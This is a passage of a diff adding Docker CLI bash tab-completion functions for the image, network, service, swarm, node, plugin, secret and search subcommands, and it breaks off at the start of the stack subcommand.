+				*)
+					COMPREPLY=( $( compgen -W "$(__docker_plugins --type Network) $(__docker_networks) container:" -- "$cur") )
+					if [ "${COMPREPLY[*]}" = "container:" ] ; then
+						__docker_nospace
+					fi
+					;;
+			esac
+			return
+			;;
+		--tag|-t)
+			__docker_complete_image_repos_and_tags
+			return
+			;;
+		$(__docker_to_extglob "$options_with_args") )
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) )
+			;;
+		*)
+			local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) )
+			if [ $cword -eq $counter ]; then
+				_filedir -d
+			fi
+			;;
+	esac
+}
+
+_docker_image_history() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --human=false -H=false --no-trunc --quiet -q" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				__docker_complete_images
+			fi
+			;;
+	esac
+}
+
+_docker_image_images() {
+	_docker_image_ls
+}
+
+_docker_image_import() {
+	case "$prev" in
+		--change|-c|--message|-m)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--change -c --help --message -m" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag '--change|-c|--message|-m')
+			if [ $cword -eq $counter ]; then
+				return
+			fi
+			(( counter++ ))
+
+			if [ $cword -eq $counter ]; then
+				__docker_complete_image_repos_and_tags
+				return
+			fi
+			;;
+	esac
+}
+
+_docker_image_inspect() {
+	_docker_inspect --type image
+}
+
+_docker_image_load() {
+	case "$prev" in
+		--input|-i)
+			_filedir
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --input -i --quiet -q" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_image_list() {
+	_docker_image_ls
+}
+
+_docker_image_ls() {
+	local key=$(__docker_map_key_of_current_option '--filter|-f')
+	case "$key" in
+		before|since|reference)
+			cur="${cur##*=}"
+			__docker_complete_images
+			return
+			;;
+		dangling)
+			COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) )
+			return
+			;;
+		label)
+			return
+			;;
+	esac
+
+	case "$prev" in
+		--filter|-f)
+			COMPREPLY=( $( compgen -S = -W "before dangling label reference since" -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+                --format)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--all -a --digests --filter -f --format --help --no-trunc --quiet -q" -- "$cur" ) )
+			;;
+		=)
+			return
+			;;
+		*)
+			__docker_complete_image_repos
+			;;
+	esac
+}
+
+_docker_image_prune() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--all -a --force -f --help" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_image_pull() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--all-tags -a --disable-content-trust=false --help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				for arg in "${COMP_WORDS[@]}"; do
+					case "$arg" in
+						--all-tags|-a)
+							__docker_complete_image_repos
+							return
+							;;
+					esac
+				done
+				__docker_complete_image_repos_and_tags
+			fi
+			;;
+	esac
+}
+
+_docker_image_push() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--disable-content-trust=false --help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				__docker_complete_image_repos_and_tags
+			fi
+			;;
+	esac
+}
+
+_docker_image_remove() {
+	_docker_image_rm
+}
+
+_docker_image_rm() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--force -f --help --no-prune" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_images
+			;;
+	esac
+}
+
+_docker_image_rmi() {
+	_docker_image_rm
+}
+
+_docker_image_save() {
+	case "$prev" in
+		--output|-o)
+			_filedir
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --output -o" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_images
+			;;
+	esac
+}
+
+_docker_image_tag() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+
+			if [ $cword -eq $counter ]; then
+				__docker_complete_image_repos_and_tags
+				return
+			fi
+			(( counter++ ))
+
+			if [ $cword -eq $counter ]; then
+				__docker_complete_image_repos_and_tags
+				return
+			fi
+			;;
+	esac
+}
+
+
+_docker_images() {
+	_docker_image_ls
+}
+
+_docker_import() {
+	_docker_image_import
+}
+
+_docker_info() {
+	_docker_system_info
+}
+
+_docker_inspect() {
+	local preselected_type
+	local type
+
+	if [ "$1" = "--type" ] ; then
+		preselected_type=yes
+		type="$2"
+	else
+		type=$(__docker_value_of_option --type)
+	fi
+
+	case "$prev" in
+		--format|-f)
+			return
+			;;
+		--type)
+			if [ -z "$preselected_type" ] ; then
+				COMPREPLY=( $( compgen -W "container image network node plugin service volume" -- "$cur" ) )
+				return
+			fi
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			local options="--format -f --help --size -s"
+			if [ -z "$preselected_type" ] ; then
+				options+=" --type"
+			fi
+			COMPREPLY=( $( compgen -W "$options" -- "$cur" ) )
+			;;
+		*)
+			case "$type" in
+				'')
+					COMPREPLY=( $( compgen -W "
+						$(__docker_containers --all)
+						$(__docker_images)
+						$(__docker_networks)
+						$(__docker_nodes)
+						$(__docker_plugins_installed)
+						$(__docker_services)
+						$(__docker_volumes)
+					" -- "$cur" ) )
+					;;
+				container)
+					__docker_complete_containers_all
+					;;
+				image)
+					__docker_complete_images
+					;;
+				network)
+					__docker_complete_networks
+					;;
+				node)
+					__docker_complete_nodes
+					;;
+				plugin)
+					__docker_complete_plugins_installed
+					;;
+				service)
+					__docker_complete_services
+					;;
+				volume)
+					__docker_complete_volumes
+					;;
+			esac
+	esac
+}
+
+_docker_kill() {
+	_docker_container_kill
+}
+
+_docker_load() {
+	_docker_image_load
+}
+
+_docker_login() {
+	case "$prev" in
+		--password|-p|--username|-u)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --password -p --username -u" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_logout() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_logs() {
+	_docker_container_logs
+}
+
+_docker_network_connect() {
+	local options_with_args="
+		--alias
+		--ip
+		--ip6
+		--link
+		--link-local-ip
+	"
+
+	local boolean_options="
+		--help
+	"
+
+	case "$prev" in
+		--link)
+			case "$cur" in
+				*:*)
+					;;
+				*)
+					__docker_complete_containers_running
+					COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) )
+					__docker_nospace
+					;;
+			esac
+			return
+			;;
+		$(__docker_to_extglob "$options_with_args") )
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) )
+			;;
+		*)
+			local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) )
+			if [ $cword -eq $counter ]; then
+				__docker_complete_networks
+			elif [ $cword -eq $(($counter + 1)) ]; then
+				__docker_complete_containers_all
+			fi
+			;;
+	esac
+}
+
+_docker_network_create() {
+	case "$prev" in
+		--aux-address|--gateway|--internal|--ip-range|--ipam-opt|--ipv6|--opt|-o|--subnet)
+			return
+			;;
+		--ipam-driver)
+			COMPREPLY=( $( compgen -W "default" -- "$cur" ) )
+			return
+			;;
+		--driver|-d)
+			# remove drivers that allow one instance only, add drivers missing in `docker info`
+			__docker_complete_plugins_bundled --type Network --remove host --remove null --add macvlan
+			return
+			;;
+		--label)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--attachable --aux-address --driver -d --gateway --help --internal --ip-range --ipam-driver --ipam-opt --ipv6 --label --opt -o --subnet" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_network_disconnect() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				__docker_complete_networks
+			elif [ $cword -eq $(($counter + 1)) ]; then
+				__docker_complete_containers_in_network "$prev"
+			fi
+			;;
+	esac
+}
+
+_docker_network_inspect() {
+	case "$prev" in
+		--format|-f)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_networks
+	esac
+}
+
+_docker_network_ls() {
+	local key=$(__docker_map_key_of_current_option '--filter|-f')
+	case "$key" in
+		driver)
+			__docker_complete_plugins_bundled --cur "${cur##*=}" --type Network --add macvlan
+			return
+			;;
+		id)
+			__docker_complete_networks --cur "${cur##*=}" --id
+			return
+			;;
+		name)
+			__docker_complete_networks --cur "${cur##*=}" --name
+			return
+			;;
+		type)
+			COMPREPLY=( $( compgen -W "builtin custom" -- "${cur##*=}" ) )
+			return
+			;;
+	esac
+
+	case "$prev" in
+		--filter|-f)
+			COMPREPLY=( $( compgen -S = -W "driver id label name type" -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+		--format)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--filter -f --format --help --no-trunc --quiet -q" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_network_prune() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_network_rm() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_networks --filter type=custom
+	esac
+}
+
+_docker_network() {
+	local subcommands="
+		connect
+		create
+		disconnect
+		inspect
+		ls
+		prune
+		rm
+	"
+	__docker_subcommands "$subcommands" && return
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_service() {
+	local subcommands="
+		create
+		inspect
+		ls list
+		rm remove
+		scale
+		ps
+		update
+	"
+	__docker_daemon_is_experimental && subcommands+="logs"
+
+	__docker_subcommands "$subcommands" && return
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_service_create() {
+	_docker_service_update
+}
+
+_docker_service_inspect() {
+	case "$prev" in
+		--format|-f)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--format -f --help --pretty" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_services
+	esac
+}
+
+_docker_service_logs() {
+	case "$prev" in
+		--since|--tail)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--details --follow -f --help --no-resolve --since --tail --timestamps -t" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag '--since|--tail')
+			if [ $cword -eq $counter ]; then
+				__docker_complete_services
+			fi
+			;;
+	esac
+}
+
+_docker_service_list() {
+	_docker_service_ls
+}
+
+_docker_service_ls() {
+	local key=$(__docker_map_key_of_current_option '--filter|-f')
+	case "$key" in
+		id)
+			__docker_complete_services --cur "${cur##*=}" --id
+			return
+			;;
+		name)
+			__docker_complete_services --cur "${cur##*=}" --name
+			return
+			;;
+	esac
+
+	case "$prev" in
+		--filter|-f)
+			COMPREPLY=( $( compgen -W "id label name" -S = -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_service_remove() {
+	_docker_service_rm
+}
+
+_docker_service_rm() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_services
+	esac
+}
+
+_docker_service_scale() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_services
+			__docker_append_to_completions "="
+			__docker_nospace
+			;;
+	esac
+}
+
+_docker_service_ps() {
+	local key=$(__docker_map_key_of_current_option '--filter|-f')
+	case "$key" in
+		desired-state)
+			COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) )
+			return
+			;;
+		name)
+			__docker_complete_services --cur "${cur##*=}" --name
+			return
+			;;
+		node)
+			__docker_complete_nodes_plus_self --cur "${cur##*=}"
+			return
+			;;
+	esac
+
+	case "$prev" in
+		--filter|-f)
+			COMPREPLY=( $( compgen -W "desired-state id name node" -S = -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--filter -f --help --no-resolve --no-trunc --quiet -q" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag '--filter|-f')
+			if [ $cword -eq $counter ]; then
+				__docker_complete_services
+			fi
+			;;
+	esac
+}
+
+_docker_service_update() {
+	local $subcommand="${words[$subcommand_pos]}"
+
+	local options_with_args="
+		--constraint
+		--endpoint-mode
+		--env -e
+		--force
+		--health-cmd
+		--health-interval
+		--health-retries
+		--health-timeout
+		--hostname
+		--label -l
+		--limit-cpu
+		--limit-memory
+		--log-driver
+		--log-opt
+		--mount
+		--network
+		--no-healthcheck
+		--replicas
+		--reserve-cpu
+		--reserve-memory
+		--restart-condition
+		--restart-delay
+		--restart-max-attempts
+		--restart-window
+		--rollback
+		--stop-grace-period
+		--update-delay
+		--update-failure-action
+		--update-max-failure-ratio
+		--update-monitor
+		--update-parallelism
+		--user -u
+		--workdir -w
+	"
+
+	local boolean_options="
+		--help
+		--tty -t
+		--with-registry-auth
+	"
+
+	__docker_complete_log_driver_options && return
+
+	if [ "$subcommand" = "create" ] ; then
+		options_with_args="$options_with_args
+			--container-label
+			--dns
+			--dns-option
+			--dns-search
+			--env-file
+			--group
+			--host
+			--mode
+			--name
+			--publish -p
+			--secret
+		"
+
+		case "$prev" in
+			--env-file)
+				_filedir
+				return
+				;;
+			--host)
+				case "$cur" in
+					*:)
+						__docker_complete_resolved_hostname
+						return
+						;;
+				esac
+				;;
+			--mode)
+				COMPREPLY=( $( compgen -W "global replicated" -- "$cur" ) )
+				return
+				;;
+			--secret)
+				__docker_complete_secrets
+				return
+				;;
+			--group)
+			COMPREPLY=( $(compgen -g -- "$cur") )
+			return
+			;;
+		esac
+	fi
+	if [ "$subcommand" = "update" ] ; then
+		options_with_args="$options_with_args
+			--arg
+			--container-label-add
+			--container-label-rm
+			--dns-add
+			--dns-option-add
+			--dns-option-rm
+			--dns-rm
+			--dns-search-add
+			--dns-search-rm
+			--group-add
+			--group-rm
+			--host-add
+			--host-rm
+			--image
+			--publish-add
+			--publish-rm
+			--secret-add
+			--secret-rm
+		"
+
+		case "$prev" in
+			--group-add)
+				COMPREPLY=( $(compgen -g -- "$cur") )
+				return
+				;;
+			--group-rm)
+				COMPREPLY=( $(compgen -g -- "$cur") )
+				return
+				;;
+			--host-add|--host-rm)
+				case "$cur" in
+					*:)
+						__docker_complete_resolved_hostname
+						return
+						;;
+				esac
+				;;
+			--image)
+				__docker_complete_image_repos_and_tags
+				return
+				;;
+			--secret-add|--secret-rm)
+				__docker_complete_secrets
+				return
+				;;
+		esac
+	fi
+
+	case "$prev" in
+		--endpoint-mode)
+			COMPREPLY=( $( compgen -W "dnsrr vip" -- "$cur" ) )
+			return
+			;;
+		--env|-e)
+			# we do not append a "=" here because "-e VARNAME" is legal systax, too
+			COMPREPLY=( $( compgen -e -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+		--log-driver)
+			__docker_complete_log_drivers
+			return
+			;;
+		--log-opt)
+			__docker_complete_log_options
+			return
+			;;
+		--network)
+			__docker_complete_networks
+			return
+			;;
+		--restart-condition)
+			COMPREPLY=( $( compgen -W "any none on-failure" -- "$cur" ) )
+			return
+			;;
+		--user|-u)
+			__docker_complete_user_group
+			return
+			;;
+		$(__docker_to_extglob "$options_with_args") )
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) )
+			;;
+		*)
+			local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) )
+			if [ "$subcommand" = "update" ] ; then
+				if [ $cword -eq $counter ]; then
+					__docker_complete_services
+				fi
+			else
+				if [ $cword -eq $counter ]; then
+					__docker_complete_images
+				fi
+			fi
+			;;
+	esac
+}
+
+_docker_swarm() {
+	local subcommands="
+		init
+		join
+		join-token
+		leave
+		unlock
+		unlock-key
+		update
+	"
+	__docker_subcommands "$subcommands" && return
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_swarm_init() {
+	case "$prev" in
+		--advertise-addr)
+			if [[ $cur == *: ]] ; then
+				COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) )
+			else
+				__docker_complete_local_interfaces
+				__docker_nospace
+			fi
+			return
+			;;
+		--availability)
+			COMPREPLY=( $( compgen -W "active drain pause" -- "$cur" ) )
+			return
+			;;
+		--cert-expiry|--dispatcher-heartbeat|--external-ca|--max-snapshots|--snapshot-interval|--task-history-limit)
+			return
+			;;
+		--listen-addr)
+			if [[ $cur == *: ]] ; then
+				COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) )
+			else
+				__docker_complete_local_interfaces --add 0.0.0.0
+				__docker_nospace
+			fi
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--advertise-addr --autolock --availability --cert-expiry --dispatcher-heartbeat --external-ca --force-new-cluster --help --listen-addr --max-snapshots --snapshot-interval --task-history-limit" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_swarm_join() {
+	case "$prev" in
+		--advertise-addr)
+			if [[ $cur == *: ]] ; then
+				COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) )
+			else
+				__docker_complete_local_interfaces
+				__docker_nospace
+			fi
+			return
+			;;
+		--listen-addr)
+			if [[ $cur == *: ]] ; then
+				COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) )
+			else
+				__docker_complete_local_interfaces --add 0.0.0.0
+				__docker_nospace
+			fi
+			return
+			;;
+		--token)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--advertise-addr --help --listen-addr --token" -- "$cur" ) )
+			;;
+		*:)
+			COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) )
+			;;
+	esac
+}
+
+_docker_swarm_join-token() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --quiet -q --rotate" -- "$cur" ) )
+			;;
+		*)
+			local counter=$( __docker_pos_first_nonflag )
+			if [ $cword -eq $counter ]; then
+				COMPREPLY=( $( compgen -W "manager worker" -- "$cur" ) )
+			fi
+			;;
+	esac
+}
+
+_docker_swarm_leave() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_swarm_unlock() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_swarm_unlock-key() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --quiet -q --rotate" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_swarm_update() {
+	case "$prev" in
+		--cert-expiry|--dispatcher-heartbeat|--external-ca|--max-snapshots|--snapshot-interval|--task-history-limit)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--autolock --cert-expiry --dispatcher-heartbeat --external-ca --help --max-snapshots --snapshot-interval --task-history-limit" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_node() {
+	local subcommands="
+		demote
+		inspect
+		ls list
+		promote
+		rm remove
+		ps
+		update
+	"
+	__docker_subcommands "$subcommands" && return
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_node_demote() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_nodes --filter role=manager
+	esac
+}
+
+_docker_node_inspect() {
+	case "$prev" in
+		--format|-f)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--format -f --help --pretty" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_nodes_plus_self
+	esac
+}
+
+_docker_node_list() {
+	_docker_node_ls
+}
+
+_docker_node_ls() {
+	local key=$(__docker_map_key_of_current_option '--filter|-f')
+	case "$key" in
+		id)
+			__docker_complete_nodes --cur "${cur##*=}" --id
+			return
+			;;
+		name)
+			__docker_complete_nodes --cur "${cur##*=}" --name
+			return
+			;;
+	esac
+
+	case "$prev" in
+		--filter|-f)
+			COMPREPLY=( $( compgen -W "id label name" -S = -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_node_promote() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_nodes --filter role=worker
+	esac
+}
+
+_docker_node_remove() {
+	_docker_node_rm
+}
+
+_docker_node_rm() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_nodes
+	esac
+}
+
+_docker_node_ps() {
+	local key=$(__docker_map_key_of_current_option '--filter|-f')
+	case "$key" in
+		desired-state)
+			COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) )
+			return
+			;;
+		name)
+			__docker_complete_services --cur "${cur##*=}" --name
+			return
+			;;
+	esac
+
+	case "$prev" in
+		--filter|-f)
+			COMPREPLY=( $( compgen -W "desired-state id label name" -S = -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--filter -f --help --no-resolve --no-trunc" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_nodes_plus_self
+			;;
+	esac
+}
+
+_docker_node_update() {
+	case "$prev" in
+		--availability)
+			COMPREPLY=( $( compgen -W "active drain pause" -- "$cur" ) )
+			return
+			;;
+		--role)
+			COMPREPLY=( $( compgen -W "manager worker" -- "$cur" ) )
+			return
+			;;
+		--label-add|--label-rm)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--availability --help --label-add --label-rm --role" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_nodes
+	esac
+}
+
+_docker_pause() {
+	_docker_container_pause
+}
+
+_docker_plugin() {
+	local subcommands="
+		create
+		disable
+		enable
+		inspect
+		install
+		ls
+		push
+		rm
+		set
+	"
+	local aliases="
+		list
+		remove
+	"
+	__docker_subcommands "$subcommands $aliases" && return
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_plugin_create() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--compress --help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				# reponame
+				return
+			elif [ $cword -eq  $((counter + 1)) ]; then
+				_filedir -d
+			fi
+			;;
+	esac
+}
+
+_docker_plugin_disable() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				__docker_complete_plugins_installed
+			fi
+			;;
+	esac
+}
+
+_docker_plugin_enable() {
+	case "$prev" in
+		--timeout)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --timeout" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag '--timeout')
+			if [ $cword -eq $counter ]; then
+				__docker_complete_plugins_installed
+			fi
+			;;
+	esac
+}
+
+_docker_plugin_inspect() {
+	case "$prev" in
+		--format|f)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_plugins_installed
+			;;
+	esac
+}
+
+_docker_plugin_install() {
+	case "$prev" in
+		--alias)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--alias --disable --disable-content-trust=false --grant-all-permissions --help" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_plugin_list() {
+	_docker_plugin_ls
+}
+
+_docker_plugin_ls() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --no-trunc" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_plugin_push() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				__docker_complete_plugins_installed
+			fi
+			;;
+	esac
+}
+
+_docker_plugin_remove() {
+	_docker_plugin_rm
+}
+
+_docker_plugin_rm() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_plugins_installed
+			;;
+	esac
+}
+
+_docker_plugin_set() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				__docker_complete_plugins_installed
+			fi
+			;;
+	esac
+}
+
+
+_docker_port() {
+	_docker_container_port
+}
+
+_docker_ps() {
+	_docker_container_ls
+}
+
+_docker_pull() {
+	_docker_image_pull
+}
+
+_docker_push() {
+	_docker_image_push
+}
+
+_docker_rename() {
+	_docker_container_rename
+}
+
+_docker_restart() {
+	_docker_container_restart
+}
+
+_docker_rm() {
+	_docker_container_rm
+}
+
+_docker_rmi() {
+	_docker_image_rm
+}
+
+_docker_run() {
+	_docker_container_run
+}
+
+_docker_save() {
+	_docker_image_save
+}
+
+
+_docker_secret() {
+	local subcommands="
+		create
+		inspect
+		ls
+		rm
+	"
+	local aliases="
+		list
+		remove
+	"
+	__docker_subcommands "$subcommands $aliases" && return
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_secret_create() {
+	case "$prev" in
+		--label|-l)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --label -l" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_secret_inspect() {
+	case "$prev" in
+		--format|-f)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_secrets
+			;;
+	esac
+}
+
+_docker_secret_list() {
+	_docker_secret_ls
+}
+
+_docker_secret_ls() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --quiet -q" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_secret_remove() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_secrets
+			;;
+	esac
+}
+
+_docker_secret_rm() {
+	_docker_secret_remove
+}
+
+
+
+_docker_search() {
+	local key=$(__docker_map_key_of_current_option '--filter|-f')
+	case "$key" in
+		is-automated)
+			COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) )
+			return
+			;;
+		is-official)
+			COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) )
+			return
+			;;
+	esac
+
+	case "$prev" in
+		--filter|-f)
+			COMPREPLY=( $( compgen -S = -W "is-automated is-official stars" -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+		--limit)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--filter --help --limit --no-trunc" -- "$cur" ) )
+			;;
+	esac
+}
+
+
+_docker_stack() {
+	local subcommands="
+		deploy
